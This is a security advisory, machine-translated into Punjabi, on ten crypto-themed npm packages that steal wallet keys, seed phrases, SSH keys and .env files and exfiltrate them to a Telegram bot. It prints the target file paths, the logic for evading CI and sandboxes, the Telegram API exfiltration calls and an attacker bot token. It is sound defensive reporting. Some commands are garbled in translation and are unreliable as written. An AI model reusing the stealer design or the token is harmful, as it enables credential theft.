TL; ਡਾ
9 ਜੂਨ 2026 ਨੂੰ ਇੱਕ ਸਿੰਗਲ npm ਪ੍ਰਕਾਸ਼ਕ ਖਾਤਾ, aicrypto-xzggg, ਭੇਜਿਆ ਗਿਆ ਦਸ ਪੈਕੇਜ ਕ੍ਰਿਪਟੋ- ਅਤੇ ਵੈੱਬ3-ਸੁਆਦ ਵਾਲੇ ਨਾਵਾਂ ਨਾਲ — farming-tools-12, swap-sdk-87, defi-tools-39, wallet-sdk-9, ਅਤੇ ਛੇ ਹੋਰ।
ਹਰੇਕ ਪੈਕੇਜ ਇੱਕ ਤੋਂ ਇੱਕੋ ਜਿਹਾ ਪੇਲੋਡ ਚਲਾਉਂਦਾ ਹੈ postinstall ਹੁੱਕ। ਇੰਸਟਾਲ ਕਰਨ 'ਤੇ, ਇਹ ਜਾਂਚ ਕਰਦਾ ਹੈ ਕਿ ਇਹ CI ਦੇ ਅੰਦਰ ਚੱਲ ਰਿਹਾ ਹੈ ਜਾਂ ਸੈਂਡਬੌਕਸ ਦੇ ਅੰਦਰ - ਜੇਕਰ ਨਹੀਂ, ਤਾਂ ਇਹ ਵਾਲਿਟ ਕੀਸਟੋਰ, ਸੀਡ-ਫ੍ਰੇਜ਼ ਫਾਈਲਾਂ, SSH ਕੁੰਜੀਆਂ, ਅਤੇ ਪੜ੍ਹਦਾ ਹੈ। .env ਛੇ ਬਲਾਕਚੈਨ ਈਕੋਸਿਸਟਮ ਤੋਂ ਫਾਈਲਾਂ ਇਕੱਤਰ ਕਰਦਾ ਹੈ ਅਤੇ ਉਹਨਾਂ ਨੂੰ ਇੱਕ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ ਵਿੱਚ ਭੇਜਦਾ ਹੈ।
ਇੱਕ ਡਿਫੈਂਡਰ ਜਿਸ ਇੱਕੋ ਸੂਚਕ ਦੀ ਤੁਰੰਤ ਭਾਲ ਕਰ ਸਕਦਾ ਹੈ ਉਹ ਹੈ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ ਆਈਡੀ। 8227918239.
ਗੰਭੀਰਤਾ: ਨਾਜ਼ੁਕ — ਦਸਤਖਤ ਕਰਨ ਵਾਲੀਆਂ ਕੁੰਜੀਆਂ ਅਤੇ ਰਿਕਵਰੀ ਵਾਕਾਂਸ਼ਾਂ ਦੀ ਸਿੱਧੀ ਚੋਰੀ ਡਿਵੈਲਪਰ ਵਰਕਸਟੇਸ਼ਨ.
ਹਮਲਾ: ਇਹ ਕਿਵੇਂ ਕੰਮ ਕਰਦਾ ਹੈ
ਇਹ ਪੈਕੇਜ ਆਪਣੇ ਆਪ ਨੂੰ ਬਲਾਕਚੈਨ ਡਿਵੈਲਪਰ ਉਪਯੋਗਤਾਵਾਂ ਵਜੋਂ ਇਸ਼ਤਿਹਾਰ ਦਿੰਦੇ ਹਨ। ਪੈਕੇਜ.ਜਸਨ ਘੱਟੋ-ਘੱਟ ਹੈ ਅਤੇ ਇੰਸਟਾਲ ਜੀਵਨਚੱਕਰ ਨੂੰ ਇੱਕ ਸਕ੍ਰਿਪਟ 'ਤੇ ਇਸ਼ਾਰਾ ਕਰਦਾ ਹੈ:
{ "name": "farming-tools-12", "main": "src/index.js", "scripts": { "postinstall": "node scripts/postinstall.js" }, "keywords": ["web3", "crypto", "blockchain", "solana", "ethereum"], "author": "Alex Smith", "license": "MIT" } ਸਕ੍ਰਿਪਟਾਂ/postinstall.js ਇੱਕ ਇੱਕ-ਲਾਈਨ ਸ਼ਿਮ ਹੈ ਜੋ ਅਸਲ ਪੇਲੋਡ ਨੂੰ ਲੋਡ ਕਰਦਾ ਹੈ: ਲੋੜ (“../src/index.js”). ਕਿਉਂਕਿ ਪੋਸਟਇੰਸਟਾਲ ਦੌਰਾਨ ਆਪਣੇ ਆਪ ਚੱਲਦਾ ਹੈ npm ਇੰਸਟਾਲ, ਡਿਵੈਲਪਰ ਦੁਆਰਾ ਕੋਈ ਕੋਡ ਆਯਾਤ ਕਰਨ ਦੀ ਲੋੜ ਨਹੀਂ ਹੈ — ਪੈਕੇਜ ਨੂੰ ਨਿਰਭਰਤਾ ਟ੍ਰੀ ਵਿੱਚ ਰੱਖਣਾ ਇਸਨੂੰ ਚਲਾਉਣ ਲਈ ਕਾਫ਼ੀ ਹੈ।
ਅੰਦਰ ਮਾਰਨ ਦੀ ਲੜੀ src/index.js ਚਾਰ ਕਦਮ ਹਨ:
- ਵਾਤਾਵਰਣ ਜਾਂਚ। ਇੱਕ ਗਾਰਡ ਫੰਕਸ਼ਨ ਇਹ ਫੈਸਲਾ ਕਰਦਾ ਹੈ ਕਿ ਹੋਸਟ ਇੱਕ ਬਿਲਡ ਏਜੰਟ ਵਰਗਾ ਦਿਖਦਾ ਹੈ ਜਾਂ ਵਿਸ਼ਲੇਸ਼ਣ ਸੈਂਡਬੌਕਸ।
- ਦੇਰੀ। ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਨੂੰ ਇੱਕ ਦੇ ਪਿੱਛੇ ਮੁਲਤਵੀ ਕਰ ਦਿੱਤਾ ਗਿਆ ਹੈ ਸੈੱਟਟਾਈਮਆਊਟ ਲਗਭਗ 7.4 ਸਕਿੰਟ।
- ਸੰਗ੍ਰਹਿ. ਵਾਲਿਟ, ਕੁੰਜੀ, ਅਤੇ ਗੁਪਤ ਫਾਈਲ ਮਾਰਗਾਂ ਦੀ ਇੱਕ ਨਿਸ਼ਚਿਤ ਸੂਚੀ ਚੱਲਦੀ ਹੈ; ਮੌਜੂਦਾ ਫਾਈਲਾਂ ਕਤਾਰ ਵਿੱਚ ਹਨ।
- ਐਕਸਫਿਲਟਰੇਸ਼ਨ। ਕਤਾਰਬੱਧ ਫਾਈਲਾਂ ਇੱਕ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ ਨੂੰ ਭੇਜੀਆਂ ਜਾਂਦੀਆਂ ਹਨ, ਜਿਸ ਤੋਂ ਪਹਿਲਾਂ ਇੱਕ ਸੰਖੇਪ ਸੁਨੇਹਾ ਆਉਂਦਾ ਹੈ।
ਸੰਗ੍ਰਹਿ ਟੀਚਾ ਸੂਚੀ ਛੇ ਚੇਨਾਂ ਅਤੇ ਆਮ ਵਿਕਾਸਕਾਰ ਰਾਜ਼ਾਂ ਨੂੰ ਫੈਲਾਉਂਦੀ ਹੈ। ਛਾਂਟੀ ਕੀਤੀ ਗਈ:
~/.config/solana/id.json ~/.ethereum/keystore ~/.solana/keypair.json ~/.bitcoin/wallet.dat ~/.tron_wallet/keystore ~/.sui/sui_config/sui.keystore ~/.aptos/key.txt ~/.ssh/id_rsa , ~/.ssh/id_ed25519 ./wallet.json ./keystore.json ./mnemonic.txt ./seed.txt ./seedphrase.txt ./recovery.txt ./private.key ./.env ./.env.local ਕੁੱਲ ਇੱਕੀ ਮਾਰਗ। ਡਾਇਰੈਕਟਰੀ ਐਂਟਰੀਆਂ ਜਿਵੇਂ ਕਿ ~/.ਈਥਰਿਅਮ/ਕੀਸਟੋਰ ਫੈਲਾਏ ਜਾਂਦੇ ਹਨ ਅਤੇ ਅੰਦਰਲੀ ਹਰ ਫਾਈਲ ਕਤਾਰ ਵਿੱਚ ਹੁੰਦੀ ਹੈ। ਐਕਸਫਿਲਟਰੇਸ਼ਨ ਸਿੱਧੇ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ API ਦੀ ਵਰਤੋਂ ਕਰਦਾ ਹੈ — a ਸੁਨੇਹਾ ਭੇਜੋ ਇੱਕ ਹੋਸਟ ਅਤੇ ਫਾਈਲ ਸੰਖੇਪ ਨਾਲ ਕਾਲ ਕਰੋ, ਫਿਰ ਇੱਕ ਦਸਤਾਵੇਜ਼ ਭੇਜੋ ਹਰੇਕ ਫਾਈਲ ਲਈ ਮਲਟੀਪਾਰਟ ਅਪਲੋਡ:
ਪਾਠ ਨੂੰ
POST https://api.telegram.org/bot<token>/sendMessage POST https://api.telegram.org/bot<token>/sendDocument (one per file) ਕੋਡ ਦੁਆਰਾ ਇਕੱਠਾ ਕੀਤਾ ਜਾਣ ਵਾਲਾ ਸੰਖੇਪ ਸੁਨੇਹਾ ਸ਼ਾਬਦਿਕ ਸਤਰ ਨਾਲ ਸ਼ੁਰੂ ਹੁੰਦਾ ਹੈ। ਕ੍ਰਿਪਟੋ ਸਟੀਲਰ, ਉਸ ਤੋਂ ਬਾਅਦ ਹੋਸਟਨੇਮ, ਯੂਜ਼ਰਨੇਮ, ਓਰੀਜਨਿੰਗ ਪੈਕੇਜ ਨਾਮ, ਫਾਈਲ ਗਿਣਤੀ, ਅਤੇ ਟਾਈਮਸਟੈਂਪ।
ਇੱਥੇ ਨਵਾਂ ਕੀ ਹੈ?
ਵੱਖਰਾ ਕਰਨ ਵਾਲਾ ਕਾਰਕ ਚੋਰੀ ਦੀ ਵਿਧੀ ਨਹੀਂ ਹੈ — npm ਤੋਂ ਟੈਲੀਗ੍ਰਾਮ-ਅਧਾਰਿਤ ਐਕਸਫਿਲ ਪੋਸਟਇੰਸਟਾਲ hooks ਚੰਗੀ ਤਰ੍ਹਾਂ ਮਿੱਧਿਆ ਹੋਇਆ ਹੈ। ਇਹ ਹੈ ਐਗਜ਼ੀਕਿਊਸ਼ਨ ਗੇਟ। ਕੁਝ ਵੀ ਕਰਨ ਤੋਂ ਪਹਿਲਾਂ, ਪੇਲੋਡ ਇੱਕ ਫੰਕਸ਼ਨ ਨੂੰ ਕਾਲ ਕਰਦਾ ਹੈ ਜੋ ਸਹੀ ਵਾਪਸ ਕਰਦਾ ਹੈ ਜਦੋਂ ਹੋਸਟ ਇੱਕ CI ਰਨਰ ਜਾਂ ਸੈਂਡਬੌਕਸ ਵਰਗਾ ਹੁੰਦਾ ਹੈ, ਅਤੇ ਜਲਦੀ ਵਾਪਸ ਆਉਂਦਾ ਹੈ ਜਦੋਂ ਇਹ ਕਰਦਾ ਹੈ:
ਪਾਠ ਨੂੰ
isTestEnvironment() is true when ANY of: - env CI == "true" OR GITHUB_ACTIONS == "true" OR JENKINS_HOME set - env NODE_ENV in {test, development} - username/USER contains: runner, sandbox, test, docker, jenkins, gitlab, travis, circleci - hostname contains: sandbox, test, ci - hostname matches /^[a-f0-9]{12}$/ (a container-id shape) ਕੰਟੇਨਰ-ਆਈਡੀ ਰੇਜੈਕਸ ਇੱਕ ਮਹੱਤਵਪੂਰਨ ਧਾਰਾ ਹੈ: ਇੱਕ 12-ਹੈਕਸ-ਅੱਖਰ ਹੋਸਟਨੇਮ ਡਿਫਾਲਟ ਸ਼ਕਲ ਹੈ ਜੋ ਡੌਕਰ ਇੱਕ ਨੂੰ ਨਿਰਧਾਰਤ ਕਰਦਾ ਹੈ ਕੰਟੇਨਰ, ਇਸ ਲਈ ਪੇਲੋਡ "ਮੇਰਾ ਹੋਸਟਨੇਮ ਡੌਕਰ ਕੰਟੇਨਰ ਵਰਗਾ ਲੱਗਦਾ ਹੈ" ਨੂੰ ਸੁਸਤ ਰਹਿਣ ਦੇ ਕਾਰਨ ਵਜੋਂ ਮੰਨਦਾ ਹੈ। ਸੱਤ-ਸਕਿੰਟ ਦੀ ਦੇਰੀ ਦੇ ਨਾਲ, ਡਿਜ਼ਾਈਨ ਇੱਕ ਡਿਵੈਲਪਰ ਦੇ ਅਸਲ ਵਰਕਸਟੇਸ਼ਨ 'ਤੇ ਚੱਲਣ ਅਤੇ ਕਿਤੇ ਵੀ ਚੁੱਪ ਰਹਿਣ ਦਾ ਸਮਰਥਨ ਕਰਦਾ ਹੈ ਜੋ ਆਟੋਮੇਟਿਡ ਵਿਸ਼ਲੇਸ਼ਣ ਵਰਗਾ ਦਿਖਾਈ ਦਿੰਦਾ ਹੈ। ਉਹ ਗੇਟ ਉਹ ਹੈ ਜਿਸਨੇ ਗਤੀਸ਼ੀਲ-ਵਿਸ਼ਲੇਸ਼ਣ ਸਿਗਨਲਾਂ ਨੂੰ ਦਬਾ ਦਿੱਤਾ ਅਤੇ ਸਥਿਰ ਐਕਸਫਿਲ ਪ੍ਰਵਾਹ ਨੂੰ ਪ੍ਰਾਇਮਰੀ ਦੋਸ਼ੀ ਸਬੂਤ ਵਜੋਂ ਰੱਖਿਆ।
ਟਾਈਮਲਾਈਨ
| ਮਿਤੀ (UTC) | ਘਟਨਾ |
|---|---|
| 2026-06-09 ~02:48 | ਪ੍ਰਕਾਸ਼ਨ 'ਤੇ ਫਲੈਗ ਕੀਤੇ ਗਏ ਕਲੱਸਟਰ ਦੇ ਪਹਿਲੇ ਪੈਕੇਜ (crypto-utils-7, ethereum-kit-1, web3-tools-9, solana-core-4, blockchain-helper-0) |
| 2026-06-09 ~03:21–03:25 | ਉੱਚ-ਵਰਜਨ ਵਾਲੇ ਮੈਂਬਰਾਂ ਨੂੰ ਫਲੈਗ ਕੀਤਾ ਗਿਆ (ethereum-kit-9 1.25.36 ਤੇ, wallet-sdk-9 3.7.73 ਵਜੇ) |
| 2026-06-09 ~03:58–03:59 | ਅੰਤਿਮ ਮੈਂਬਰਾਂ ਨੂੰ ਫਲੈਗ ਕੀਤਾ ਗਿਆ (defi-tools-39 4.26.29 ਤੇ, swap-sdk-87 4.63.78 ਤੇ, farming-tools-12 4.68.54 ਵਜੇ) |
| 2026-06-09 | ਸਾਰੇ ਦਸ ਵਰਗੀਕ੍ਰਿਤ ਖਤਰਨਾਕ ਅਤੇ ਰਜਿਸਟਰੀ ਹਟਾਉਣ ਲਈ ਰਿਪੋਰਟ ਕੀਤੇ ਗਏ |
ਸਾਰੇ ਦਸ ਲਗਭਗ ਸੱਤਰ ਮਿੰਟਾਂ ਦੇ ਅੰਦਰ ਸਾਹਮਣੇ ਆਏ, ਇੱਕ ਖਾਤੇ ਤੋਂ ਚੱਲੇ ਇੱਕ ਸਕ੍ਰਿਪਟਡ ਪ੍ਰਕਾਸ਼ਨ ਦੇ ਅਨੁਸਾਰ।
ਸਮਝੌਤਾ ਦੇ ਸੂਚਕ
ਨੈੱਟਵਰਕ ਅਤੇ ਵਿਵਹਾਰਕ ਸੂਚਕ (ਹੋਸਟ ਡਿਫੈਂਜਡ):
| ਸੂਚਕ | ਮੁੱਲ |
|---|---|
| ਐਕਸਫਿਲ ਐਂਡਪੁਆਇੰਟ | api[.]telegram[.]org (ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ API) |
| ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ ਆਈਡੀ | 8227918239 |
| ਬੋਟ ਟੋਕਨ | 8227918239:AAGEMDrBZluDsBBYPxfSyMuv2l3FY8cZCcs |
| ਟੈਲੀਗ੍ਰਾਮ ਚੈਟ ਆਈਡੀ | 6433587894 |
| ਹੁੱਕ ਲਗਾਓ | postinstall → scripts/postinstall.js → src/index.js |
| ਮਾਰਕਰ ਸਟ੍ਰਿੰਗ | CRYPTO STEALER ਇਕੱਠੇ ਕੀਤੇ ਸੰਖੇਪ ਸੁਨੇਹੇ ਵਿੱਚ |
| ਪ੍ਰਕਾਸ਼ਕ | aicrypto-xzggg (ਦੱਸੀ ਗਈ ਈਮੇਲ vipsyria88@gmail[.]com, ਅਣ-ਪ੍ਰਮਾਣਿਤ) |
ਪੈਕੇਜ ਅਤੇ ਸੰਸਕਰਣ, ਹਰੇਕ ਦੇ SHA-256 ਦੇ ਨਾਲ src/index.js ਪੇਲੋਡ (ਪੇਲੋਡ ਕਾਰਜਸ਼ੀਲ ਤੌਰ 'ਤੇ ਇੱਕੋ ਜਿਹੇ ਹਨ ਅਤੇ ਸਿਰਫ਼ ਏਮਬੈਡਡ ਪੈਕੇਜ-ਨਾਮ ਲੇਬਲ ਵਿੱਚ ਵੱਖਰੇ ਹਨ, ਇਸ ਲਈ ਹਰੇਕ ਹੈਸ਼ ਵੱਖਰਾ ਹੈ):
| ਪੈਕੇਜ | ਵਰਜਨ | src/index.js ਦਾ SHA-256 |
|---|---|---|
farming-tools-12 | 4.68.54 | b50403be9dd9f94f7af4795c1e346c9d27d5a18041a3044773238c4cdc1f4de4 |
swap-sdk-87 | 4.63.78 | 9d96f8759e8d593b6dd2338aceb08cdb12e9a5613700953e04e66cc8c2e3087c |
defi-tools-39 | 4.26.29 | ddc5011b6173a57bc7f29b010ed6b71551dee253b5d05d3efc78d076f5351fee |
wallet-sdk-9 | 3.7.73 | ef4459281c64f1fe8923d703d416f04080ff1a2b7b385366f46d7cdb25731502 |
ethereum-kit-9 | 1.25.36 | c43afad949027040c6414d26fa4eea6e2671d2572f9df7fd595e12baf204854f |
ethereum-kit-1 | 1.0.0 | 1147f5227f3b13f65a438b31d87766c33affc65b7734a8658c95e0a4be1d2381 |
solana-core-4 | 1.0.0 | 93c65f971137d2753b5c57b685471bf5319bdc357fa863de56cbed8447cf576d |
web3-tools-9 | 1.0.0 | db97070bd349503f5703404493fc925448c2308c86708b33786309ebe6446a3d |
crypto-utils-7 | 1.0.0 | 59f2fb112d6f17102fb4a70c8d12bfcbc93e9f0d170fe4451bad1aa4d5d74c92 |
blockchain-helper-0 | 1.0.0 | 053eb318980439d76eecac9847ae31ecf59654cf75ddcfebbdd9ce64bb98a0db |
ਇੱਕ ਸਧਾਰਨ ਸ਼ਿਕਾਰ ਪੁੱਛਗਿੱਛ: ਦਸ ਨਾਵਾਂ ਵਿੱਚੋਂ ਕਿਸੇ ਲਈ ਵੀ ਇੰਸਟਾਲ ਲੌਗ ਅਤੇ ਲੌਕਫਾਈਲਾਂ ਦੀ ਖੋਜ ਕਰੋ, ਅਤੇ ਬਿਲਡ ਜਾਂ ਡਿਵੈਲਪਰ ਹੋਸਟਾਂ ਤੋਂ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ API ਨਾਲ ਕਨੈਕਸ਼ਨਾਂ ਲਈ ਆਊਟਬਾਊਂਡ ਟ੍ਰੈਫਿਕ ਦੀ ਖੋਜ ਕਰੋ ਜੋ ਇਸਦੀ ਵਰਤੋਂ ਨਹੀਂ ਕਰਦੇ ਹਨ।
ਵਿਸ਼ੇਸ਼ਤਾ ਅਤੇ ਨਿਰੀਖਣ ਕੀਤਾ ਵਿਵਹਾਰ
ਸਾਰੇ ਦਸ ਪੈਕੇਜ ਇੱਕ ਖਾਤੇ ਦੁਆਰਾ ਪ੍ਰਕਾਸ਼ਿਤ ਕੀਤੇ ਗਏ ਸਨ, ਏਕ੍ਰਿਪਟੋ-ਐਕਸਜ਼ੈਗਜੀ, ਜਿਸਦੀ ਦੱਸੀ ਗਈ ਈਮੇਲ ਹੈ vipsyria88@gmail[.]com. ਈਮੇਲ ਅਤੇ ਸਰੋਤ-ਨਿਯੰਤਰਣ ਲਿੰਕ ਦੋਵੇਂ ਰਜਿਸਟਰੀ ਮੈਟਾਡੇਟਾ ਵਿੱਚ ਪ੍ਰਮਾਣਿਤ ਨਹੀਂ ਹਨ, ਅਤੇ ਖਾਤੇ ਦਾ ਇੱਕ ਬਹੁਤ ਹੀ ਨਕਾਰਾਤਮਕ ਪ੍ਰਤਿਸ਼ਠਾ ਸਕੋਰ ਹੈ। ਅਸੀਂ ਇਸ ਗੱਲ ਦੀ ਪੁਸ਼ਟੀ ਨਹੀਂ ਕੀਤੀ ਹੈ ਕਿ ਖਾਤਾ ਕੌਣ ਚਲਾਉਂਦਾ ਹੈ।
ਕਿਸੇ ਵੀ ਪਛਾਣ ਦਾਅਵੇ ਤੋਂ ਦੋ ਵੇਰਵੇ ਵੱਖ ਕਰਨ ਦੇ ਯੋਗ ਹਨ। ਪਹਿਲਾਂ, ਪੈਕੇਜ.ਜਸਨ ਲੇਖਕ ਫੀਲਡ ਰੀਡਜ਼ ਐਲੇਕਸ ਸਮਿਥ ਹਰੇਕ ਪੈਕੇਜ 'ਤੇ, ਜਦੋਂ ਕਿ ਅਸਲ ਪ੍ਰਕਾਸ਼ਨ ਖਾਤਾ ਹੈ ਏਕ੍ਰਿਪਟੋ-ਐਕਸਜ਼ੈਗਜੀ; ਲੇਖਕ ਖੇਤਰ ਸਵੈ-ਘੋਸ਼ਿਤ ਮੈਟਾਡੇਟਾ ਹੈ ਅਤੇ ਲੇਖਕਤਾ ਸਥਾਪਤ ਨਹੀਂ ਕਰਦਾ ਹੈ। ਦੂਜਾ, ਸੰਸਕਰਣ ਨੰਬਰ ਵਿਆਪਕ ਤੌਰ 'ਤੇ ਵੱਖ-ਵੱਖ ਹੁੰਦੇ ਹਨ — ਕੁਝ ਮੈਂਬਰ ਇੱਥੇ ਬੈਠਦੇ ਹਨ 1.0.0, ਹੋਰਾਂ 'ਤੇ 4.68.54 — ਜੋ ਕਿ ਅਸਲ ਰੀਲੀਜ਼ ਇਤਿਹਾਸ ਨੂੰ ਬਣਾਈ ਰੱਖਣ ਦੀ ਬਜਾਏ ਤਾਜ਼ੇ ਬਣਾਏ ਪੈਕੇਜ ਨਾਵਾਂ ਵਿੱਚ ਇੱਕ ਸਿੰਗਲ ਪੇਲੋਡ ਦੀ ਮੁੜ ਵਰਤੋਂ ਦੇ ਅਨੁਕੂਲ ਹੈ।
ਸਾਰੇ ਕਲੱਸਟਰ ਵਿੱਚ ਵਿਵਹਾਰ ਇੱਕਸਾਰ ਹੈ: ਉਹੀ ਟਾਰਗੇਟ ਪਾਥ ਸੂਚੀ, ਉਹੀ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ ਆਈਡੀ ਅਤੇ ਚੈਟ ਆਈਡੀ, ਉਹੀ ਵਾਤਾਵਰਣ ਗੇਟ, ਉਹੀ ਕ੍ਰਿਪਟੋ ਸਟੀਲਰ ਮਾਰਕਰ। ਉਹ ਇਕਸਾਰਤਾ ਪੈਕੇਜਾਂ ਵਿਚਕਾਰ ਸਭ ਤੋਂ ਮਜ਼ਬੂਤ ਕੜੀ ਹੈ। ਇਹ ਇੱਕ ਸਮਾਨ-ਆਪਰੇਟਰ ਸਿਗਨਲ ਹੈ, ਪਛਾਣ ਨਹੀਂ।
ਡਿਫੈਂਡਰਾਂ ਲਈ ਪ੍ਰਭਾਵ, ਰੁਝਾਨ ਅਤੇ ਮਾਰਗਦਰਸ਼ਨ
ਐਕਸਪੋਜ਼ਰ ਠੋਸ ਹੈ। ਇੱਕ ਡਿਵੈਲਪਰ ਜੋ ਇਹਨਾਂ ਵਿੱਚੋਂ ਕਿਸੇ ਵੀ ਪੈਕੇਜ ਨੂੰ ਇੱਕ ਵਰਕਸਟੇਸ਼ਨ 'ਤੇ ਸਥਾਪਿਤ ਕਰਦਾ ਹੈ ਜਿਸ ਵਿੱਚ ਇੱਕ ਸਾਫਟਵੇਅਰ ਵਾਲਿਟ, ਇੱਕ ਸੀਡ-ਫ੍ਰੇਜ਼ ਫਾਈਲ, ਜਾਂ ਇੱਕ SSH ਕੁੰਜੀ ਹੁੰਦੀ ਹੈ, ਉਹਨਾਂ ਫਾਈਲਾਂ ਨੂੰ ਸਕਿੰਟਾਂ ਦੇ ਅੰਦਰ ਹੋਸਟ ਤੋਂ ਪੜ੍ਹ ਅਤੇ ਪ੍ਰਸਾਰਿਤ ਕਰ ਦਿੱਤਾ ਜਾਂਦਾ ਹੈ। ਰਿਕਵਰੀ ਵਾਕਾਂਸ਼ ਅਤੇ ਸਾਈਨਿੰਗ ਕੁੰਜੀਆਂ ਦੀ ਮਿਆਦ ਸੈਸ਼ਨ ਟੋਕਨ ਵਾਂਗ ਨਹੀਂ ਖਤਮ ਹੁੰਦੀ; ਇੱਕ ਵਾਰ ਮੈਮੋਨਿਕ.txt ਜਾਂ ਸੋਲਾਨਾ ਆਈਡੀ.ਜੇਸਨ ਮਸ਼ੀਨ ਛੱਡ ਦਿੰਦੀ ਹੈ, ਇਸ ਦੁਆਰਾ ਨਿਯੰਤਰਿਤ ਫੰਡ ਉਦੋਂ ਤੱਕ ਜੋਖਮ ਵਿੱਚ ਰਹਿੰਦੇ ਹਨ ਜਦੋਂ ਤੱਕ ਉਹਨਾਂ ਨੂੰ ਤਬਦੀਲ ਨਹੀਂ ਕੀਤਾ ਜਾਂਦਾ। ਉਹੀ ਦੌੜ ਵੀ ਕੈਪਚਰ ਕਰਦੀ ਹੈ .env ਫਾਈਲਾਂ, ਜੋ ਨਿਯਮਿਤ ਤੌਰ 'ਤੇ API ਕੁੰਜੀਆਂ ਅਤੇ ਡੇਟਾਬੇਸ ਪ੍ਰਮਾਣ ਪੱਤਰ ਰੱਖਦੀਆਂ ਹਨ।
ਇਸ ਕਲੱਸਟਰ ਦੇ ਪਿੱਛੇ ਦੋ ਰੁਝਾਨ ਹਨ। ਪਹਿਲਾ ਹੈ ਕ੍ਰਿਪਟੋ- ਅਤੇ ਵੈੱਬ3-ਥੀਮ ਵਾਲੇ ਨਾਵਾਂ ਦੀ ਨਿਰੰਤਰ ਵਰਤੋਂ ਇੱਕ ਖਾਸ ਦਰਸ਼ਕਾਂ ਨੂੰ ਆਕਰਸ਼ਿਤ ਕਰਨ ਲਈ - ਡਿਵੈਲਪਰ ਜੋ ਵਾਲਿਟ ਅਤੇ ਕੁੰਜੀਆਂ ਉਸੇ ਮਸ਼ੀਨ 'ਤੇ ਰੱਖਦੇ ਹਨ ਜਿਸ 'ਤੇ ਉਹ ਨਿਰਭਰਤਾਵਾਂ ਸਥਾਪਿਤ ਕਰਦੇ ਹਨ। ਦੂਜਾ ਹੈ ਇੰਸਟਾਲ-ਟਾਈਮ ਪੇਲੋਡਾਂ ਵਿੱਚ ਸੈਂਡਬੌਕਸ ਚੋਰੀ ਦੀ ਪਰਿਪੱਕਤਾ। ਇੱਕ ਗੇਟ ਜੋ CI ਵਾਤਾਵਰਣ ਵੇਰੀਏਬਲ, ਰਨਰ ਉਪਭੋਗਤਾ ਨਾਮ, ਅਤੇ ਇੱਕ ਡੌਕਰ ਕੰਟੇਨਰ-ਆਈਡੀ ਹੋਸਟਨੇਮ ਆਕਾਰ ਦੀ ਜਾਂਚ ਕਰਦਾ ਹੈ, ਇੱਕ ਅਸਲ ਵਰਕਸਟੇਸ਼ਨ ਨਾਲੋਂ ਵਿਸ਼ਲੇਸ਼ਣ ਅਧੀਨ ਵੱਖਰੇ ਢੰਗ ਨਾਲ ਵਿਵਹਾਰ ਕਰਨ ਦਾ ਇੱਕ ਜਾਣਬੁੱਝ ਕੇ ਯਤਨ ਹੈ, ਅਤੇ ਇਹ ਪੂਰੀ ਤਰ੍ਹਾਂ ਗਤੀਸ਼ੀਲ ਖੋਜ ਲਈ ਬਾਰ ਨੂੰ ਵਧਾਉਂਦਾ ਹੈ।
ਡਿਫੈਂਡਰਾਂ ਲਈ:
ਡਿਫਾਲਟ ਤੌਰ 'ਤੇ ਅਯੋਗ ਸਕ੍ਰਿਪਟਾਂ ਨਾਲ ਇੰਸਟਾਲ ਕਰੋ। npm ਇੰਸਟਾਲ - ਅਣਡਿੱਠਾ-ਸਕ੍ਰਿਪਟਾਂ, ਜਾਂ ਸੈੱਟ ਕਰੋ ਅਣਦੇਖਾ-ਸਕ੍ਰਿਪਟਾਂ = ਸੱਚ in .npmrc, ਰੋਕਦਾ ਹੈ ਪੋਸਟਇੰਸਟਾਲ ਐਗਜ਼ੀਕਿਊਸ਼ਨ; ਸਿਰਫ਼ ਉਹਨਾਂ ਖਾਸ ਨਿਰਭਰਤਾਵਾਂ ਲਈ ਸਕ੍ਰਿਪਟਾਂ ਨੂੰ ਸਮਰੱਥ ਬਣਾਓ ਜਿਨ੍ਹਾਂ ਨੂੰ ਉਹਨਾਂ ਦੀ ਸੱਚਮੁੱਚ ਲੋੜ ਹੈ।
ਵਾਲਿਟ ਅਤੇ ਸਾਈਨਿੰਗ ਕੁੰਜੀਆਂ ਨੂੰ ਬਿਲਡ ਅਤੇ ਡਿਵੈਲਪਮੈਂਟ ਮਸ਼ੀਨਾਂ ਤੋਂ ਦੂਰ ਰੱਖੋ। ਇੱਕ ਹਾਰਡਵੇਅਰ ਵਾਲਿਟ ਜਾਂ ਇੱਕ ਸਮਰਪਿਤ, ਨਿਰਭਰਤਾ-ਮੁਕਤ ਸਾਈਨਿੰਗ ਹੋਸਟ ਦੀ ਵਰਤੋਂ ਕਰੋ।
ਇਲਾਜ .env, ਕੀਸਟੋਰ, ਅਤੇ ਸੀਡ-ਫ੍ਰੇਜ਼ ਫਾਈਲਾਂ ਨੂੰ ਤਾਜ ਦੇ ਗਹਿਣਿਆਂ ਵਜੋਂ। ਉਹਨਾਂ ਨੂੰ ਕਦੇ ਵੀ ਅਜਿਹੀ ਡਾਇਰੈਕਟਰੀ ਵਿੱਚ ਨਹੀਂ ਬੈਠਣਾ ਚਾਹੀਦਾ ਜੋ ਇੱਕ npm ਇੰਸਟਾਲ ਕੰਮ ਕਰਨ ਵਾਲਾ ਰੁੱਖ।
CI ਅਤੇ ਡਿਵੈਲਪਰ ਹੋਸਟਾਂ ਤੋਂ ਟੈਲੀਗ੍ਰਾਮ ਬੋਟ API ਲਈ ਆਊਟਬਾਊਂਡ ਕਨੈਕਸ਼ਨਾਂ ਦੀ ਭਾਲ ਕਰੋ। ਜ਼ਿਆਦਾਤਰ ਬਿਲਡ ਵਾਤਾਵਰਣ ਕਦੇ ਵੀ ਇਸਨੂੰ ਨਹੀਂ ਕਹਿੰਦੇ; ਇੱਕ ਜੋ ਅਚਾਨਕ, ਇੰਸਟਾਲੇਸ਼ਨ ਤੋਂ ਤੁਰੰਤ ਬਾਅਦ ਅਜਿਹਾ ਹੁੰਦਾ ਹੈ, ਜਾਂਚ ਕਰਨ ਯੋਗ ਹੈ।
